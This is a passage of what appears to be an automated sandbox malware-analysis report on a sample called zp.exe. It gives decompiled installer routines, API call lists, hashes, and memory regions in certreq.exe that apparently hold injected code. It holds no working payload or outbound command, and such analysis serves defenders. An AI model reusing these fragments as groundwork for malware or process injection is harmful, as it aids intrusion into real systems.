                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: FileWritelstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll
                                                            • API String ID: 427699356-3008052661
                                                            • Opcode ID: 8eacd2d9b7f99dff19a7d48110e68cc3b05eb08ac038617508e0e838a67c6ccb
                                                            • Instruction ID: ec6543fef349a6256ae9c0be30bf33b46acbb68c9f58cc1a2edee276f495746f
                                                            • Opcode Fuzzy Hash: 8eacd2d9b7f99dff19a7d48110e68cc3b05eb08ac038617508e0e838a67c6ccb
                                                            • Instruction Fuzzy Hash: 71F089B2A14244BFEB40EBA49E49AAB7768DB40304F10443BB142F61C2D6FC4941EB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405491(CHAR* _a4) {
                                                            				struct _PROCESS_INFORMATION _v20;
                                                            				int _t7;
                                                            
                                                            				0x4214e8->cb = 0x44;
                                                            				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4214e8,  &_v20);
                                                            				if(_t7 != 0) {
                                                            					CloseHandle(_v20.hThread);
                                                            					return _v20.hProcess;
                                                            				}
                                                            				return _t7;
                                                            			}





                                                            0x0040549a
                                                            0x004054b6
                                                            0x004054be
                                                            0x004054c3
                                                            0x00000000
                                                            0x004054c9
                                                            0x004054cd

                                                            APIs
                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B6
                                                            • CloseHandle.KERNEL32(?), ref: 004054C3
                                                            Strings
                                                            • Error launching installer, xrefs: 004054A4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                            • Instruction ID: 3eb9eeac69da88a372b0c135ba7ac0e5d0d4abdecbe03941738571e2a7ac68f4
                                                            • Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                            • Instruction Fuzzy Hash: 31E0E674A0020AABDB10EFA4DD4596F7BBDEB10305B408531B914E2160D774D810CA79
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004057B5(char* _a4) {
                                                            				char* _t3;
                                                            				char* _t5;
                                                            
                                                            				_t5 = _a4;
                                                            				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                            				while( *_t3 != 0x5c) {
                                                            					_t3 = CharPrevA(_t5, _t3);
                                                            					if(_t3 > _t5) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				 *_t3 =  *_t3 & 0x00000000;
                                                            				return  &(_t3[1]);
                                                            			}





                                                            0x004057b6
                                                            0x004057c0
                                                            0x004057c2
                                                            0x004057c9
                                                            0x004057d1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004057d1
                                                            0x004057d3
                                                            0x004057d8

                                                            APIs
                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zp.exe,C:\Users\user\Desktop\zp.exe,80000000,00000003), ref: 004057BB
                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zp.exe,C:\Users\user\Desktop\zp.exe,80000000,00000003), ref: 004057C9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-3370423016
                                                            • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                            • Instruction ID: 707dbef540ece1ff312b000549851e46262dd825b0763663a0da280226ece44d
                                                            • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                            • Instruction Fuzzy Hash: A4D0A76241CE705EF30352149C00B8F6A58CF12700F090462E180A7591C27C0D414BBE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				char* _t17;
                                                            				char _t19;
                                                            				void* _t20;
                                                            				void* _t24;
                                                            				void* _t27;
                                                            				void* _t31;
                                                            				void* _t37;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            				signed int _t43;
                                                            				void* _t52;
                                                            				char* _t53;
                                                            				char* _t55;
                                                            				void* _t56;
                                                            				void* _t58;
                                                            
                                                            				 *0x1000405c = _a8;
                                                            				 *0x10004060 = _a16;
                                                            				 *0x10004064 = _a12;
                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573, _t52);
                                                            				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
                                                            				_t17 = E1000123B();
                                                            				_a8 = _t17;
                                                            				_t53 = _t17;
                                                            				if( *_t17 == 0) {
                                                            					L16:
                                                            					return GlobalFree(_a8);
                                                            				} else {
                                                            					do {
                                                            						_t19 =  *_t53;
                                                            						_t55 = _t53 + 1;
                                                            						_t58 = _t19 - 0x6c;
                                                            						if(_t58 > 0) {
                                                            							_t20 = _t19 - 0x70;
                                                            							if(_t20 == 0) {
                                                            								L12:
                                                            								_t53 = _t55 + 1;
                                                            								_t24 = E10001278(E100012BF( *_t55 - 0x30));
                                                            								L13:
                                                            								GlobalFree(_t24);
                                                            								goto L14;
                                                            							}
                                                            							_t27 = _t20;
                                                            							if(_t27 == 0) {
                                                            								L10:
                                                            								_t53 = _t55 + 1;
                                                            								_t24 = E100012E8( *_t55 - 0x30, E1000123B());
                                                            								goto L13;
                                                            							}
                                                            							L7:
                                                            							if(_t27 == 1) {
                                                            								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                            								 *_t31 =  *0x10004030;
                                                            								 *0x10004030 = _t31;
                                                            								E10001525(_t31 + 4,  *0x10004064, _t43);
                                                            								_t56 = _t56 + 0xc;
                                                            							}
                                                            							goto L14;
                                                            						}
                                                            						if(_t58 == 0) {
                                                            							L17:
                                                            							_t34 =  *0x10004030;
                                                            							if( *0x10004030 != 0) {
                                                            								E10001525( *0x10004064, _t34 + 4, _t43);
                                                            								_t37 =  *0x10004030;
                                                            								_t56 = _t56 + 0xc;
                                                            								GlobalFree(_t37);
                                                            								 *0x10004030 =  *_t37;
                                                            							}
                                                            							goto L14;
                                                            						}
                                                            						_t39 = _t19 - 0x4c;
                                                            						if(_t39 == 0) {
                                                            							goto L17;
                                                            						}
                                                            						_t40 = _t39 - 4;
                                                            						if(_t40 == 0) {
                                                            							 *_t55 =  *_t55 + 0xa;
                                                            							goto L12;
                                                            						}
                                                            						_t27 = _t40;
                                                            						if(_t27 == 0) {
                                                            							 *_t55 =  *_t55 + 0xa;
                                                            							goto L10;
                                                            						}
                                                            						goto L7;
                                                            						L14:
                                                            					} while ( *_t53 != 0);
                                                            					goto L16;
                                                            				}
                                                            			}


















                                                            0x100010e7
                                                            0x100010ef
                                                            0x10001103
                                                            0x1000110b
                                                            0x10001116
                                                            0x10001119
                                                            0x10001121
                                                            0x10001124
                                                            0x10001126
                                                            0x100011c4
                                                            0x100011d0
                                                            0x1000112c
                                                            0x1000112d
                                                            0x1000112d
                                                            0x10001130
                                                            0x10001131
                                                            0x10001134
                                                            0x10001203
                                                            0x10001206
                                                            0x1000119e
                                                            0x100011a4
                                                            0x100011ac
                                                            0x100011b1
                                                            0x100011b4
                                                            0x00000000
                                                            0x100011b4
                                                            0x10001209
                                                            0x1000120a
                                                            0x10001186
                                                            0x1000118c
                                                            0x10001194
                                                            0x00000000
                                                            0x10001194
                                                            0x10001152
                                                            0x10001153
                                                            0x1000115b
                                                            0x10001168
                                                            0x10001170
                                                            0x10001179
                                                            0x1000117e
                                                            0x1000117e
                                                            0x00000000
                                                            0x10001153
                                                            0x1000113a
                                                            0x100011d1
                                                            0x100011d1
                                                            0x100011d8
                                                            0x100011e5
                                                            0x100011ea
                                                            0x100011ef
                                                            0x100011f5
                                                            0x100011fb
                                                            0x100011fb
                                                            0x00000000
                                                            0x100011d8
                                                            0x10001140
                                                            0x10001143
                                                            0x00000000
                                                            0x00000000
                                                            0x10001149
                                                            0x1000114c
                                                            0x1000119b
                                                            0x00000000
                                                            0x1000119b
                                                            0x1000114f
                                                            0x10001150
                                                            0x10001183
                                                            0x00000000
                                                            0x10001183
                                                            0x00000000
                                                            0x100011ba
                                                            0x100011ba
                                                            0x00000000
                                                            0x100011c3

                                                            APIs
                                                              • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                              • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                            • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                            • GlobalFree.KERNEL32(?), ref: 100011C7
                                                            • GlobalFree.KERNEL32(?), ref: 100011F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5831148892.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.5831123478.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831177085.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831203248.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_zp.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloclstrcpy
                                                            • String ID:
                                                            • API String ID: 852173138-0
                                                            • Opcode ID: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
                                                            • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                                            • Opcode Fuzzy Hash: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
                                                            • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004058D4(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                            				int _v8;
                                                            				int _t12;
                                                            				int _t14;
                                                            				int _t15;
                                                            				CHAR* _t17;
                                                            				CHAR* _t27;
                                                            
                                                            				_t12 = lstrlenA(_a8);
                                                            				_t27 = _a4;
                                                            				_v8 = _t12;
                                                            				while(lstrlenA(_t27) >= _v8) {
                                                            					_t14 = _v8;
                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                            					if(_t15 == 0) {
                                                            						_t17 = _t27;
                                                            					} else {
                                                            						_t27 = CharNextA(_t27);
                                                            						continue;
                                                            					}
                                                            					L5:
                                                            					return _t17;
                                                            				}
                                                            				_t17 = 0;
                                                            				goto L5;
                                                            			}









                                                            0x004058e4
                                                            0x004058e6
                                                            0x004058e9
                                                            0x00405915
                                                            0x004058ee
                                                            0x004058f7
                                                            0x004058fc
                                                            0x00405907
                                                            0x0040590a
                                                            0x00405926
                                                            0x0040590c
                                                            0x00405913
                                                            0x00000000
                                                            0x00405913
                                                            0x0040591f
                                                            0x00405923
                                                            0x00405923
                                                            0x0040591d
                                                            0x00000000

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                            • lstrcmpiA.KERNEL32(00405B03,00000000), ref: 004058FC
                                                            • CharNextA.USER32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 0040590D
                                                            • lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                            • Instruction ID: 62085d2c31476900ff85a65f94f7eb43c3272102ba613799eb3dd48313e2814d
                                                            • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                            • Instruction Fuzzy Hash: 12F0C232604418FFC7129FA5DC0099EBBA8EF46360B2140A9E800F7210D674EF019BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,?,?), ref: 000702FE
                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00001000,?), ref: 0007034C
                                                            • LocalFree.KERNELBASE(00000000), ref: 000703BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000003.6284073689.0000000000070000.00000020.00001000.00020000.00000000.sdmp, Offset: 00070000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_3_70000_zp.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal$FreeVirtual
                                                            • String ID: ,
                                                            • API String ID: 1791776162-3772416878
                                                            • Opcode ID: e3acfca55933822c155660506bd812470d889a6c1c683faf6f7b57039a729d84
                                                            • Instruction ID: 67b1e782c94ec90c86561b7981cee9fa76789720b60ff39ac3efd68f5f30f8e5
                                                            • Opcode Fuzzy Hash: e3acfca55933822c155660506bd812470d889a6c1c683faf6f7b57039a729d84
                                                            • Instruction Fuzzy Hash: 5E410CB5900706EBCB10DF69C885EAEBBF8FF08754F14851AE959A7201D374EA50CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000003.6284073689.0000000000070000.00000020.00001000.00020000.00000000.sdmp, Offset: 00070000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_3_70000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                            • Instruction ID: 893c8abcaa49288ca343acb313704e8a368a33b5b7e90349c3096de7f6a14be7
                                                            • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                            • Instruction Fuzzy Hash: F2F062BAA00300DFCB64CF49C54C89577F5FB857107658295D8089B323E378DD86C794
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000003.6498185546.00000215CE000000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000215CE000000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_3_215ce000000_certreq.jbxd
                                                            Similarity
                                                            • API ID: AcceptConnectPort$AllocateBoundaryDeleteDescriptorHeap
                                                            • String ID:
                                                            • API String ID: 3472209132-0
                                                            • Opcode ID: d559bc2f96c6d5c528e7a5e9e6e531c52d8b5c051237d51d97aba31510731f62
                                                            • Instruction ID: 776588e73e1d2d8318828c1eda536832f830f5bd9388421fa8e95682a0ccb9fd
                                                            • Opcode Fuzzy Hash: d559bc2f96c6d5c528e7a5e9e6e531c52d8b5c051237d51d97aba31510731f62
                                                            • Instruction Fuzzy Hash: E4C15430218B198FDB59EF18D489BA9B7E1FBE8310F10455EE48AD7256EB34D845CBC1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000003.6498185546.00000215CE000000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000215CE000000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_3_215ce000000_certreq.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap$BoundaryDeleteDescriptor
                                                            • String ID: l
                                                            • API String ID: 2279964584-2517025534
                                                            • Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
                                                            • Instruction ID: 4b64baaed78a968c7a0ed9eb47746b0297e98683fe54e83af8705ec23244cdf9
                                                            • Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
                                                            • Instruction Fuzzy Hash: ACA1E731618B698BD72B9E2894C96FA7BD1EBE4300F2045AEE4C7C3183ED34D942C6C1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000003.6498185546.00000215CE000000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000215CE000000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_3_215ce000000_certreq.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
                                                            • Instruction ID: 9124091987e45e2ce89b4e373ede185ac7e56731eb7bc253e5c214a8582ea736
                                                            • Opcode Fuzzy Hash: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
                                                            • Instruction Fuzzy Hash: 11017C31610F159FE7699F28D88CB66B7F1FBA8311F24066AA405C3281EB74EC91C7C1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%